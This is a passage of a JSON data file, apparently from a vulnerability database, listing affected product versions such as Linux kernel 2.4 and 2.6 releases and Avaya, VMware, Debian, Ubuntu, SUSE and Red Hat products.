        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel -git7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.2"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.5"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.31-git11",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.12"
      },
      {
        "model": "kernel 2.6.29-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.34.3"
      },
      {
        "model": "esxi server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.5"
      },
      {
        "model": "kernel 2.6.31-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.31-rc5-git3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.12"
      },
      {
        "model": "voice portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.1"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.30"
      },
      {
        "model": "enterprise linux es 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "intuity audix lx sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "kernel -git1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel 2.6.32-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel -git14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.273"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.8"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.371"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.2"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel 2.6.22-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "messaging storage server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "esx server esx400-200909401",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37"
      },
      {
        "model": "enterprise linux desktop version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "esx server esx400-200912403",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "esx server esx400-201003405",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "9"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "message networking sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux enterprise desktop sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.1"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "hat enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "red",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "esx server esx400-201005401",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.6"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.2"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "linux enterprise server debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.0"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "enterprise linux 5.2.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
